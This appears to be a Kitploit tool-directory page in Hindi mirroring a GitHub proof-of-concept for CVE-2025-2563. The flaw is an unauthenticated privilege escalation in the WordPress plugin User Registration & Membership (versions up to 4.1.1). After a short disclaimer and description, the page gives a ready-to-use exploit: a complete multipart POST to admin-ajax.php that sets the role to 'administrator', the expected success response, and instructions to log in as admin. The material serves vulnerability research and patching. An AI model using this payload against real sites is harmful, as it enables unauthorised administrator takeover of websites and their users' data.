Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2563 — CVE-2025-2563 PoC | Kitploit
उपकरण/GitHubGitHub/ubaydev/cve-2025-2563
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHububaydev/cve-2025-2563

CVE-2025-2563

CVE-2025-2563 PoC

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-2563

User Registration & Membership <= 4.1.1 - बिना प्रमाणीकरण के विशेषाधिकार वृद्धि (Unauthenticated Privilege Escalation)

अस्वीकरण!

इस CVE (कॉमन वल्नरेबिलिटीज़ एंड एक्सपोज़र) राइटअप में प्रस्तुत जानकारी केवल शैक्षिक और सूचनात्मक उद्देश्यों के लिए है। दी गई जानकारी सार्वजनिक रूप से उपलब्ध संसाधनों, शोध और लेखक द्वारा किए गए विश्लेषण पर आधारित है। यह सामग्री किसी भी अवैध गतिविधि, जिसमें हैकिंग, शोषण या सिस्टम तक अनधिकृत पहुंच शामिल है, को बढ़ावा देने या प्रोत्साहित करने के लिए नहीं है।

लेखक प्रस्तुत जानकारी के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। यह अनुशंसा की जाती है कि व्यक्ति और संगठन इस ज्ञान को जिम्मेदारी से और लागू कानूनों तथा विनियमों के अनुपालन में लागू करें। पाठकों को दृढ़ता से सलाह दी जाती है कि वे भेद्यताओं का परीक्षण केवल उचित प्राधिकरण के साथ नियंत्रित वातावरण में करें।

इस राइटअप के लेखक और योगदानकर्ता दुर्भावनापूर्ण गतिविधियों का समर्थन या प्रोत्साहन नहीं करते हैं और जिम्मेदार डिस्क्लोज़र तथा नैतिक हैकिंग प्रथाओं को प्रोत्साहित करते हैं।


विवरण

वर्डप्रेस प्लगइन "User Registration & Membership" में एक गंभीर सुरक्षा भेद्यता खोजी गई है, जो सदस्यता वेबसाइट और पंजीकरण फॉर्म बनाने के लिए एक लोकप्रिय उपकरण है। CVE-2025-2563 के रूप में पहचानी गई यह खामी, CVSS स्कोर 9.8 रखती है, जो इसकी उच्च गंभीरता को दर्शाता है।

वर्डप्रेस के लिए User Registration & Membership प्लगइन, संस्करण 4.1.1 तक (4.1.1 सहित) विशेषाधिकार वृद्धि (privilege escalation) की भेद्यता से ग्रस्त है। यह 'prepare_members_data()' फ़ंक्शन में भूमिका प्रकार पर अपर्याप्त प्रतिबंधों के कारण होता है। यह बिना प्रमाणीकरण वाले हमलावरों (unauthenticated attackers) के लिए 'administrator' भूमिका के साथ नए उपयोगकर्ता खाते बनाना संभव बनाता है, निम्नलिखित शर्तों के साथ:

  1. प्लगइन में सदस्यता ऐड-ऑन सक्रिय हो
  2. पंजीकृत उपयोगकर्ता को पुष्टिकरण की आवश्यकता न हो

PoC (प्रूफ ऑफ कॉन्सेप्ट)

  1. /registration या /membership-registration पर फ्रंटएंड पेज के माध्यम से पंजीकरण करें
  2. पंजीकरण के बाद, इस अनुरोध डेटा का उपयोग करें।
    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: */*
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
    
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_register_member
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="security"
    
    THE_NONCE_HERE
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="members_data"
    
    {"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
    ----------------------------189123966817005614765335--
    
  3. प्रतिक्रिया इस प्रकार होनी चाहिए
    root@kitploit:~
    {
        "success": true,
        "data": {
            "member_id": 24,
            "transaction_id": "",
            "message": "New member has been successfully created."
        }
    }  
    
  4. अब आप व्यवस्थापक (administrator) विशेषाधिकार के साथ पंजीकृत खाते में लॉग-इन कर सकते हैं।

संदर्भ

  1. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
  2. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
  3. https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/

धन्यवाद

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
टूल डाउनलोड करें